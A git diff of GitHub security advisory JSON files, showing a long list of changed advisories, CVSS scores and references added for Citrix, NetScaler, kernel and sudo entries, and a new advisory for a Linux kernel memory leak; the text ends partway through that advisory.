.../GHSA-j523-44v9-5g5c.json | 57 +++++++++++++++++++ .../GHSA-j52g-6623-6m5j.json | 56 ++++++++++++++++++ .../GHSA-j6m8-x4v6-3fgh.json | 33 +++++++++++ .../GHSA-jp65-2h7q-qfg7.json | 2 +- .../GHSA-jqw7-w6rm-7cv4.json | 49 ++++++++++++++++ .../GHSA-jwq8-f89h-rf2h.json | 48 ++++++++++++++++ .../GHSA-m2wh-w7w6-m2cj.json | 49 ++++++++++++++++ .../GHSA-m2xg-c7hm-9g82.json | 11 +++- .../GHSA-m465-94wp-x2mq.json | 36 ++++++++++++ .../GHSA-mg6f-qcc4-f2gp.json | 52 +++++++++++++++++ .../GHSA-mh65-9fq4-rpg3.json | 40 +++++++++++++ .../GHSA-mj73-cg42-f79h.json | 41 +++++++++++++ .../GHSA-mxc4-v7c2-8m69.json | 33 +++++++++++ .../GHSA-p347-69w9-6826.json | 45 +++++++++++++++ .../GHSA-p8hf-2q7f-w7h9.json | 49 ++++++++++++++++ .../GHSA-pc8h-vv6v-5wqw.json | 52 +++++++++++++++++ .../GHSA-pj7h-hw7v-pg79.json | 37 ++++++++++++ .../GHSA-pqf9-m843-ppvg.json | 33 +++++++++++ .../GHSA-pqhv-fc7x-qjmr.json | 37 ++++++++++++ .../GHSA-pvf3-8pcq-8mjg.json | 56 ++++++++++++++++++ .../GHSA-q2mh-4m4x-85qc.json | 45 +++++++++++++++ .../GHSA-q39g-p2v5-mq6j.json | 40 +++++++++++++ .../GHSA-q6ch-8cp2-xfhp.json | 41 +++++++++++++ .../GHSA-q8xm-9c69-h9m6.json | 40 +++++++++++++ .../GHSA-q9hc-qj7m-hpc9.json | 41 +++++++++++++ .../GHSA-qfpm-f474-gprj.json | 40 +++++++++++++ .../GHSA-qq4v-pr8w-v8hg.json | 37 ++++++++++++ .../GHSA-r55g-vw99-ww9p.json | 40 +++++++++++++ .../GHSA-r9h3-hffm-gf8q.json | 33 +++++++++++ .../GHSA-rv4p-hv2v-9w74.json | 44 ++++++++++++++ .../GHSA-rvp5-xxqc-hg2f.json | 37 ++++++++++++ .../GHSA-rxfj-gvqj-6mmm.json | 36 ++++++++++++ .../GHSA-v3g7-mv58-c2hx.json | 45 +++++++++++++++ .../GHSA-v4cq-578j-qhhm.json | 37 ++++++++++++ .../GHSA-v7p5-3x5h-w67g.json | 57 +++++++++++++++++++ .../GHSA-v7qp-5hjq-c978.json | 44 ++++++++++++++ .../GHSA-vj8j-2cq7-gxhm.json | 33 +++++++++++ .../GHSA-vqq6-5vrp-4ffj.json | 36 ++++++++++++ .../GHSA-vx28-r268-g868.json | 36 ++++++++++++ .../GHSA-w2qh-jwjx-rq8g.json | 40 +++++++++++++ .../GHSA-w3wq-ghx5-h8rc.json | 37 ++++++++++++ .../GHSA-w44h-qxhv-wqww.json | 40 +++++++++++++ .../GHSA-w922-jv62-78r5.json | 33 +++++++++++ .../GHSA-w962-8hwv-w52p.json | 40 +++++++++++++ .../GHSA-whcj-4wwh-8h2g.json | 37 ++++++++++++ .../GHSA-whrv-p2hp-qr7f.json | 57 +++++++++++++++++++ .../GHSA-wj97-6gr4-gfmq.json | 33 +++++++++++ .../GHSA-wx5g-cq33-j3p6.json | 37 ++++++++++++ .../GHSA-x4m7-9hjr-rhx2.json | 57 +++++++++++++++++++ .../GHSA-x6jr-wgh9-98g2.json | 37 ++++++++++++ .../GHSA-xq77-3x66-fcxc.json | 37 ++++++++++++ .../GHSA-xrp5-4mrh-cc5r.json | 44 ++++++++++++++ 149 files changed, 6114 insertions(+), 11 deletions(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-24m9-rp8m-h4jp/GHSA-24m9-rp8m-h4jp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-2v78-h87m-hpx9/GHSA-2v78-h87m-hpx9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-2x29-88x9-wfrj/GHSA-2x29-88x9-wfrj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-346m-4qgc-hqv8/GHSA-346m-4qgc-hqv8.json create mode 100644 advisories/unreviewed/2025/07/GHSA-35qw-c8w7-fcg8/GHSA-35qw-c8w7-fcg8.json create mode 100644 advisories/unreviewed/2025/07/GHSA-3fxq-g92j-92g5/GHSA-3fxq-g92j-92g5.json create mode 100644 advisories/unreviewed/2025/07/GHSA-3g73-h9cm-2486/GHSA-3g73-h9cm-2486.json create mode 100644 advisories/unreviewed/2025/07/GHSA-3g9v-mx9v-wmwv/GHSA-3g9v-mx9v-wmwv.json create mode 100644 advisories/unreviewed/2025/07/GHSA-3mgj-ppp2-8gvj/GHSA-3mgj-ppp2-8gvj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-43rg-xghf-cjwh/GHSA-43rg-xghf-cjwh.json create mode 100644 advisories/unreviewed/2025/07/GHSA-456m-93fm-gff2/GHSA-456m-93fm-gff2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-483p-f75x-jw75/GHSA-483p-f75x-jw75.json create mode 100644 advisories/unreviewed/2025/07/GHSA-495q-r22g-59m9/GHSA-495q-r22g-59m9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-4fc7-q565-7p9g/GHSA-4fc7-q565-7p9g.json create mode 100644 advisories/unreviewed/2025/07/GHSA-4fjg-wrmh-r9ch/GHSA-4fjg-wrmh-r9ch.json create mode 100644 advisories/unreviewed/2025/07/GHSA-4j4w-3wcx-mxg6/GHSA-4j4w-3wcx-mxg6.json create mode 100644 advisories/unreviewed/2025/07/GHSA-4jq7-688w-w4r4/GHSA-4jq7-688w-w4r4.json create mode 100644 advisories/unreviewed/2025/07/GHSA-4w5g-r898-rj85/GHSA-4w5g-r898-rj85.json create mode 100644 advisories/unreviewed/2025/07/GHSA-53qv-xvfg-rjr9/GHSA-53qv-xvfg-rjr9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-54gr-cf5g-5pjm/GHSA-54gr-cf5g-5pjm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-56gq-m2m7-qc85/GHSA-56gq-m2m7-qc85.json create mode 100644 advisories/unreviewed/2025/07/GHSA-585v-w359-6rw5/GHSA-585v-w359-6rw5.json create mode 100644 advisories/unreviewed/2025/07/GHSA-58vg-w4wx-wp6p/GHSA-58vg-w4wx-wp6p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-5g77-7644-h27q/GHSA-5g77-7644-h27q.json create mode 100644 advisories/unreviewed/2025/07/GHSA-5g8h-g27f-mh64/GHSA-5g8h-g27f-mh64.json create mode 100644 advisories/unreviewed/2025/07/GHSA-5pjf-mw33-c6c3/GHSA-5pjf-mw33-c6c3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-5wmp-9678-6384/GHSA-5wmp-9678-6384.json create mode 100644 advisories/unreviewed/2025/07/GHSA-5x6v-ph8q-fg62/GHSA-5x6v-ph8q-fg62.json create mode 100644 advisories/unreviewed/2025/07/GHSA-62f3-xhhg-6p74/GHSA-62f3-xhhg-6p74.json create mode 100644 advisories/unreviewed/2025/07/GHSA-637r-5w8j-mjg6/GHSA-637r-5w8j-mjg6.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6gg7-c9v3-hv72/GHSA-6gg7-c9v3-hv72.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6gw9-2x6r-hqw8/GHSA-6gw9-2x6r-hqw8.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6p9w-8r99-f39c/GHSA-6p9w-8r99-f39c.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6r64-vv6h-j895/GHSA-6r64-vv6h-j895.json create mode 100644 advisories/unreviewed/2025/07/GHSA-733g-xvvm-2g6j/GHSA-733g-xvvm-2g6j.json create mode 100644 advisories/unreviewed/2025/07/GHSA-73j2-c6c6-cr45/GHSA-73j2-c6c6-cr45.json create mode 100644 advisories/unreviewed/2025/07/GHSA-74qv-83cv-fw98/GHSA-74qv-83cv-fw98.json create mode 100644 advisories/unreviewed/2025/07/GHSA-76v9-cvv3-9m9p/GHSA-76v9-cvv3-9m9p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-783m-53vh-rmp2/GHSA-783m-53vh-rmp2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-795c-qm5f-2827/GHSA-795c-qm5f-2827.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7975-5jgq-h46c/GHSA-7975-5jgq-h46c.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7fhw-47q5-mgv8/GHSA-7fhw-47q5-mgv8.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7m5p-v483-rc7r/GHSA-7m5p-v483-rc7r.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7q3f-xf6v-wv4w/GHSA-7q3f-xf6v-wv4w.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7rw5-9g4x-gf48/GHSA-7rw5-9g4x-gf48.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7xh7-w5g7-62qv/GHSA-7xh7-w5g7-62qv.json create mode 100644 advisories/unreviewed/2025/07/GHSA-8249-rqx5-qf75/GHSA-8249-rqx5-qf75.json create mode 100644 advisories/unreviewed/2025/07/GHSA-833c-qfxr-5pp5/GHSA-833c-qfxr-5pp5.json create mode 100644 advisories/unreviewed/2025/07/GHSA-84fw-vffg-g7cp/GHSA-84fw-vffg-g7cp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-8gx9-2mgx-hm7j/GHSA-8gx9-2mgx-hm7j.json create mode 100644 advisories/unreviewed/2025/07/GHSA-8m46-hm8p-v8rj/GHSA-8m46-hm8p-v8rj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-8wmc-rr78-8pf9/GHSA-8wmc-rr78-8pf9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-8x8p-vfxm-77vf/GHSA-8x8p-vfxm-77vf.json create mode 100644 advisories/unreviewed/2025/07/GHSA-926h-7qf4-c3hq/GHSA-926h-7qf4-c3hq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-93f5-rwwh-v8p5/GHSA-93f5-rwwh-v8p5.json create mode 100644 advisories/unreviewed/2025/07/GHSA-99gr-q2p8-x55m/GHSA-99gr-q2p8-x55m.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9mf6-h5qw-3r5p/GHSA-9mf6-h5qw-3r5p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9p64-9rxj-34pm/GHSA-9p64-9rxj-34pm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9qw8-xx45-2wp7/GHSA-9qw8-xx45-2wp7.json create mode 100644 advisories/unreviewed/2025/07/GHSA-c2fx-76wh-p9mq/GHSA-c2fx-76wh-p9mq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-c3c4-j5v2-q687/GHSA-c3c4-j5v2-q687.json create mode 100644 advisories/unreviewed/2025/07/GHSA-c6g2-84gg-hc38/GHSA-c6g2-84gg-hc38.json create mode 100644 advisories/unreviewed/2025/07/GHSA-c7xc-fv22-2pq3/GHSA-c7xc-fv22-2pq3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-cfcc-w9g2-336j/GHSA-cfcc-w9g2-336j.json create mode 100644 advisories/unreviewed/2025/07/GHSA-cfr6-wmxx-cfg2/GHSA-cfr6-wmxx-cfg2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-cfvr-4cm5-x2r3/GHSA-cfvr-4cm5-x2r3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-ch6p-gm8m-r8fm/GHSA-ch6p-gm8m-r8fm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-cmm8-gw4m-26cw/GHSA-cmm8-gw4m-26cw.json create mode 100644 advisories/unreviewed/2025/07/GHSA-crh2-v64q-fq49/GHSA-crh2-v64q-fq49.json create mode 100644 advisories/unreviewed/2025/07/GHSA-cv9m-prxm-594h/GHSA-cv9m-prxm-594h.json create mode 100644 advisories/unreviewed/2025/07/GHSA-cvm7-wwgm-g3q3/GHSA-cvm7-wwgm-g3q3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-f2rv-3fq7-vhpv/GHSA-f2rv-3fq7-vhpv.json create mode 100644 advisories/unreviewed/2025/07/GHSA-f462-4c2j-6qcw/GHSA-f462-4c2j-6qcw.json create mode 100644 advisories/unreviewed/2025/07/GHSA-f5fc-m65h-gr9j/GHSA-f5fc-m65h-gr9j.json create mode 100644 advisories/unreviewed/2025/07/GHSA-f75j-r62m-hxmw/GHSA-f75j-r62m-hxmw.json create mode 100644 advisories/unreviewed/2025/07/GHSA-ffxp-vqfg-26jp/GHSA-ffxp-vqfg-26jp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-fpr2-pgq7-qwg4/GHSA-fpr2-pgq7-qwg4.json create mode 100644 advisories/unreviewed/2025/07/GHSA-fr6m-vhh9-9qj8/GHSA-fr6m-vhh9-9qj8.json create mode 100644 advisories/unreviewed/2025/07/GHSA-frwj-r649-j5gf/GHSA-frwj-r649-j5gf.json create mode 100644 advisories/unreviewed/2025/07/GHSA-fwp5-77ch-c7c8/GHSA-fwp5-77ch-c7c8.json create mode 100644 advisories/unreviewed/2025/07/GHSA-gcxf-rh2w-2m9p/GHSA-gcxf-rh2w-2m9p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-gvh3-f4g3-c9ff/GHSA-gvh3-f4g3-c9ff.json create mode 100644 advisories/unreviewed/2025/07/GHSA-gw8j-hp25-g47g/GHSA-gw8j-hp25-g47g.json create mode 100644 advisories/unreviewed/2025/07/GHSA-h43f-3486-2w3c/GHSA-h43f-3486-2w3c.json create mode 100644 advisories/unreviewed/2025/07/GHSA-h56q-f656-qf6w/GHSA-h56q-f656-qf6w.json create mode 100644 advisories/unreviewed/2025/07/GHSA-h7p2-xjmg-5hqg/GHSA-h7p2-xjmg-5hqg.json create mode 100644 advisories/unreviewed/2025/07/GHSA-h9m7-cj39-6vrg/GHSA-h9m7-cj39-6vrg.json create mode 100644 advisories/unreviewed/2025/07/GHSA-hcf7-cj24-hf8m/GHSA-hcf7-cj24-hf8m.json create mode 100644 advisories/unreviewed/2025/07/GHSA-hv89-cw42-xpf3/GHSA-hv89-cw42-xpf3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-hxvp-23fc-849f/GHSA-hxvp-23fc-849f.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j3rr-hppv-g55q/GHSA-j3rr-hppv-g55q.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j523-44v9-5g5c/GHSA-j523-44v9-5g5c.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j52g-6623-6m5j/GHSA-j52g-6623-6m5j.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j6m8-x4v6-3fgh/GHSA-j6m8-x4v6-3fgh.json create mode 100644 advisories/unreviewed/2025/07/GHSA-jqw7-w6rm-7cv4/GHSA-jqw7-w6rm-7cv4.json create mode 100644 advisories/unreviewed/2025/07/GHSA-jwq8-f89h-rf2h/GHSA-jwq8-f89h-rf2h.json create mode 100644 advisories/unreviewed/2025/07/GHSA-m2wh-w7w6-m2cj/GHSA-m2wh-w7w6-m2cj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-m465-94wp-x2mq/GHSA-m465-94wp-x2mq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-mg6f-qcc4-f2gp/GHSA-mg6f-qcc4-f2gp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-mh65-9fq4-rpg3/GHSA-mh65-9fq4-rpg3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-mj73-cg42-f79h/GHSA-mj73-cg42-f79h.json create mode 100644 advisories/unreviewed/2025/07/GHSA-mxc4-v7c2-8m69/GHSA-mxc4-v7c2-8m69.json create mode 100644 advisories/unreviewed/2025/07/GHSA-p347-69w9-6826/GHSA-p347-69w9-6826.json create mode 100644 advisories/unreviewed/2025/07/GHSA-p8hf-2q7f-w7h9/GHSA-p8hf-2q7f-w7h9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pc8h-vv6v-5wqw/GHSA-pc8h-vv6v-5wqw.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pj7h-hw7v-pg79/GHSA-pj7h-hw7v-pg79.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pqf9-m843-ppvg/GHSA-pqf9-m843-ppvg.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pqhv-fc7x-qjmr/GHSA-pqhv-fc7x-qjmr.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pvf3-8pcq-8mjg/GHSA-pvf3-8pcq-8mjg.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q2mh-4m4x-85qc/GHSA-q2mh-4m4x-85qc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q39g-p2v5-mq6j/GHSA-q39g-p2v5-mq6j.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q6ch-8cp2-xfhp/GHSA-q6ch-8cp2-xfhp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q8xm-9c69-h9m6/GHSA-q8xm-9c69-h9m6.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q9hc-qj7m-hpc9/GHSA-q9hc-qj7m-hpc9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-qfpm-f474-gprj/GHSA-qfpm-f474-gprj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-qq4v-pr8w-v8hg/GHSA-qq4v-pr8w-v8hg.json create mode 100644 advisories/unreviewed/2025/07/GHSA-r55g-vw99-ww9p/GHSA-r55g-vw99-ww9p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-r9h3-hffm-gf8q/GHSA-r9h3-hffm-gf8q.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rv4p-hv2v-9w74/GHSA-rv4p-hv2v-9w74.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rvp5-xxqc-hg2f/GHSA-rvp5-xxqc-hg2f.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rxfj-gvqj-6mmm/GHSA-rxfj-gvqj-6mmm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-v3g7-mv58-c2hx/GHSA-v3g7-mv58-c2hx.json create mode 100644 advisories/unreviewed/2025/07/GHSA-v4cq-578j-qhhm/GHSA-v4cq-578j-qhhm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-v7p5-3x5h-w67g/GHSA-v7p5-3x5h-w67g.json create mode 100644 advisories/unreviewed/2025/07/GHSA-v7qp-5hjq-c978/GHSA-v7qp-5hjq-c978.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vj8j-2cq7-gxhm/GHSA-vj8j-2cq7-gxhm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vqq6-5vrp-4ffj/GHSA-vqq6-5vrp-4ffj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vx28-r268-g868/GHSA-vx28-r268-g868.json create mode 100644 advisories/unreviewed/2025/07/GHSA-w2qh-jwjx-rq8g/GHSA-w2qh-jwjx-rq8g.json create mode 100644 advisories/unreviewed/2025/07/GHSA-w3wq-ghx5-h8rc/GHSA-w3wq-ghx5-h8rc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-w44h-qxhv-wqww/GHSA-w44h-qxhv-wqww.json create mode 100644 advisories/unreviewed/2025/07/GHSA-w922-jv62-78r5/GHSA-w922-jv62-78r5.json create mode 100644 advisories/unreviewed/2025/07/GHSA-w962-8hwv-w52p/GHSA-w962-8hwv-w52p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-whcj-4wwh-8h2g/GHSA-whcj-4wwh-8h2g.json create mode 100644 advisories/unreviewed/2025/07/GHSA-whrv-p2hp-qr7f/GHSA-whrv-p2hp-qr7f.json create mode 100644 advisories/unreviewed/2025/07/GHSA-wj97-6gr4-gfmq/GHSA-wj97-6gr4-gfmq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-wx5g-cq33-j3p6/GHSA-wx5g-cq33-j3p6.json create mode 100644 advisories/unreviewed/2025/07/GHSA-x4m7-9hjr-rhx2/GHSA-x4m7-9hjr-rhx2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-x6jr-wgh9-98g2/GHSA-x6jr-wgh9-98g2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-xq77-3x66-fcxc/GHSA-xq77-3x66-fcxc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-xrp5-4mrh-cc5r/GHSA-xrp5-4mrh-cc5r.json diff --git a/advisories/unreviewed/2024/07/GHSA-m2fx-wq5j-8657/GHSA-m2fx-wq5j-8657.json b/advisories/unreviewed/2024/07/GHSA-m2fx-wq5j-8657/GHSA-m2fx-wq5j-8657.json index bb9afc266a0fc..c2554eb970741 100644 --- a/advisories/unreviewed/2024/07/GHSA-m2fx-wq5j-8657/GHSA-m2fx-wq5j-8657.json +++ b/advisories/unreviewed/2024/07/GHSA-m2fx-wq5j-8657/GHSA-m2fx-wq5j-8657.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-m2fx-wq5j-8657", - "modified": "2024-10-30T00:31:04Z", + "modified": "2025-07-25T15:30:26Z", "published": "2024-07-10T21:30:39Z", "aliases": [ "CVE-2024-6149" ], "details": "Redirection of users to a vulnerable URL in Citrix Workspace app for HTML5", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2024/07/GHSA-p959-c7xj-w3cr/GHSA-p959-c7xj-w3cr.json b/advisories/unreviewed/2024/07/GHSA-p959-c7xj-w3cr/GHSA-p959-c7xj-w3cr.json index e20ae9a022ee4..cc25d549a5c75 100644 --- a/advisories/unreviewed/2024/07/GHSA-p959-c7xj-w3cr/GHSA-p959-c7xj-w3cr.json +++ b/advisories/unreviewed/2024/07/GHSA-p959-c7xj-w3cr/GHSA-p959-c7xj-w3cr.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p959-c7xj-w3cr", - "modified": "2024-07-10T21:30:38Z", + "modified": "2025-07-25T15:30:25Z", "published": "2024-07-10T21:30:38Z", "aliases": [ "CVE-2024-5491" ], "details": "Denial of Service in NetScaler ADC and NetScaler Gateway in NetScaler", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" @@ -22,6 +26,10 @@ { "type": "WEB", "url": "https://support.citrix.com/article/CTX677944/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20245491-and-cve20245492" + }, + { + "type": "WEB", + "url": "https://support.citrix.com/external/article?articleUrl=CTX677944-netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20245491-and-cve20245492" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/07/GHSA-wj5r-m28j-95q9/GHSA-wj5r-m28j-95q9.json b/advisories/unreviewed/2024/07/GHSA-wj5r-m28j-95q9/GHSA-wj5r-m28j-95q9.json index 754c729b88821..1f21c45bc512c 100644 --- a/advisories/unreviewed/2024/07/GHSA-wj5r-m28j-95q9/GHSA-wj5r-m28j-95q9.json +++ b/advisories/unreviewed/2024/07/GHSA-wj5r-m28j-95q9/GHSA-wj5r-m28j-95q9.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wj5r-m28j-95q9", - "modified": "2024-08-01T15:31:55Z", + "modified": "2025-07-25T15:30:25Z", "published": "2024-07-10T21:30:38Z", "aliases": [ "CVE-2024-5492" ], "details": "Open redirect vulnerability allows a remote unauthenticated attacker to redirect users to arbitrary websites in NetScaler ADC and NetScaler Gateway", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" @@ -22,6 +26,10 @@ { "type": "WEB", "url": "https://support.citrix.com/article/CTX677944/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20245491-and-cve20245492" + }, + { + "type": "WEB", + "url": "https://support.citrix.com/external/article?articleUrl=CTX677944-netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20245491-and-cve20245492" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/05/GHSA-p8pc-4q8f-r225/GHSA-p8pc-4q8f-r225.json b/advisories/unreviewed/2025/05/GHSA-p8pc-4q8f-r225/GHSA-p8pc-4q8f-r225.json index a166e18eb6213..904544a85b06f 100644 --- a/advisories/unreviewed/2025/05/GHSA-p8pc-4q8f-r225/GHSA-p8pc-4q8f-r225.json +++ b/advisories/unreviewed/2025/05/GHSA-p8pc-4q8f-r225/GHSA-p8pc-4q8f-r225.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p8pc-4q8f-r225", - "modified": "2025-07-17T18:31:09Z", + "modified": "2025-07-25T15:30:26Z", "published": "2025-05-20T18:30:58Z", "aliases": [ "CVE-2025-37984" @@ -25,6 +25,10 @@ { "type": "WEB", "url": "https://git.kernel.org/stable/c/f02f0218be412cff1c844addf58e002071be298b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f2133b849ff273abddb6da622daddd8f6f6fa448" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/06/GHSA-c5x2-97hm-x895/GHSA-c5x2-97hm-x895.json b/advisories/unreviewed/2025/06/GHSA-c5x2-97hm-x895/GHSA-c5x2-97hm-x895.json index cd0f49802b5e4..7163cf3790be6 100644 --- a/advisories/unreviewed/2025/06/GHSA-c5x2-97hm-x895/GHSA-c5x2-97hm-x895.json +++ b/advisories/unreviewed/2025/06/GHSA-c5x2-97hm-x895/GHSA-c5x2-97hm-x895.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c5x2-97hm-x895", - "modified": "2025-07-19T03:30:19Z", + "modified": "2025-07-25T15:30:26Z", "published": "2025-06-30T21:30:54Z", "aliases": [ "CVE-2025-32462" @@ -19,6 +19,30 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32462" }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/cve-2025-32462" + }, + { + "type": "WEB", + "url": "https://bugs.gentoo.org/show_bug.cgi?id=CVE-2025-32462" + }, + { + "type": "WEB", + "url": "https://explore.alas.aws.amazon.com/CVE-2025-32462.html" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-security-announce/2025/msg00118.html" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2025-32462" + }, + { + "type": "WEB", + "url": "https://ubuntu.com/security/notices/USN-7604-1" + }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2025/06/30/2" @@ -42,6 +66,10 @@ { "type": "WEB", "url": "https://www.sudo.ws/security/advisories/host_any" + }, + { + "type": "WEB", + "url": "https://www.suse.com/security/cve/CVE-2025-32462.html" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/07/GHSA-24m9-rp8m-h4jp/GHSA-24m9-rp8m-h4jp.json b/advisories/unreviewed/2025/07/GHSA-24m9-rp8m-h4jp/GHSA-24m9-rp8m-h4jp.json new file mode 100644 index 0000000000000..138925773b30a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-24m9-rp8m-h4jp/GHSA-24m9-rp8m-h4jp.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-24m9-rp8m-h4jp", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38384" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtd: spinand: fix memory leak of ECC engine conf\n\nMemory allocated for the ECC engine conf is not released during spinand\ncleanup. Below kmemleak trace is seen for this memory leak:\n\nunreferenced object 0xffffff80064f00e0 (size 8):\n comm \"swapper/0\", pid 1, jiffies 4294937458\n hex dump (first 8 bytes):\n 00 00 00 00 00 00 00 00 ........\n backtrace (crc 0):\n kmemleak_alloc+0x30/0x40\n __kmalloc_cache_noprof+0x208/0x3c0\n spinand_ondie_ecc_init_ctx+0x114/0x200\n nand_ecc_init_ctx+0x70/0xa8\n nanddev_ecc_engine_init+0xec/0x27c\n spinand_probe+0xa2c/0x1620\n spi_mem_probe+0x130/0x21c\n spi_probe+0xf0/0x170\n really_probe+0x17c/0x6e8\n __driver_probe_device+0x17c/0x21c\n driver_probe_device+0x58/0x180\n __device_attach_driver+0x15c/0x1f8\n bus_for_each_drv+0xec/0x150\n __device_attach+0x188/0x24c\n device_initial_probe+0x10/0x20\n bus_probe_device+0x11c/0x160\n\nFix the leak by calling nanddev_ecc_engine_cleanup() inside\nspinand_cleanup().", + "severity": [], + "affected": [], + "references": [ + 